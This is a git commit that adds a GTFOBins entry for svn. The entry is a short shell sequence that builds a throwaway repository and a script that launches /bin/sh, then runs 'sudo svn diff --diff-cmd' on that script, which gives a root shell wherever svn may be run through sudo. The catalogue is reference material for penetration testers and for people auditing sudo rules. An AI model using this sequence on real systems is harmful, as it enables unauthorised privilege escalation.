This commit is contained in:
frissi0n 2024-11-11 20:56:46 +00:00
parent ac8e667a7e
commit 997eeb358a

11
_gtfobins/svn.md Normal file
View File

@ -0,0 +1,11 @@
---
functions:
sudo:
- code: |
TD=$(mktemp -d)
svnadmin create $TD/pwn
svn checkout file:///$TD/pwn $TD/project
echo -e '#!/bin/bash\n/bin/sh' > $TD/shell
chmod +x $TD/shell
sudo svn diff --diff-cmd "$TD/shell"
---